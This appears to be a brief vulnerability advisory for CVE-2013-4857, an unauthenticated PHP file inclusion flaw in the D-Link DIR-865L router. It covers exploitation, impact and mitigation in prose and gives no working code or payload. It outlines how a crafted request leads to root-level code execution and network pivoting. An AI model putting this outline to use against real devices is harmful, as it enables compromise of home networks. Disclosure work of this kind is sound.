CVE-2013-4857

Vulnerability

CVE-2013-4857 describes a PHP file inclusion vulnerability in the D-Link DIR-865L router. The flaw resides in the handling of the router XML file, where an attacker can inject a path to a remote or local PHP file that the server then includes and executes. The vulnerability is present in the router's web interface and does not require authentication. Affected versions include all firmware releases for the D-Link DIR-865L prior to the vendor's patch (if any). [1]

Exploitation

An attacker can exploit this vulnerability by sending a crafted HTTP request to the router's web server, specifically targeting the XML file processing endpoint. The request includes a parameter that specifies a path to a PHP file, which the server then includes. No authentication or prior access is needed; the attacker only needs network connectivity to the router's management interface (typically on LAN or WAN if remote management is enabled). The attack does not require user interaction. [1]

Impact

Successful exploitation allows an attacker to execute arbitrary PHP code on the router with the privileges of the web server (typically root). This leads to full compromise of the router's configuration, enabling the attacker to intercept, modify, or redirect network traffic, as well as pivot to internal network devices. The impact is complete loss of confidentiality, integrity, and availability of the router and potentially the entire local network. [1]

Mitigation

As of the publication date (2019-10-25), no official patch from D-Link has been identified in the available references. Users are advised to disable remote management, restrict access to the router's web interface to trusted local networks, and consider replacing the device if it is no longer supported. The vulnerability is not listed on the CISA Known Exploited Vulnerabilities (KEV) catalog as of this writing. [1]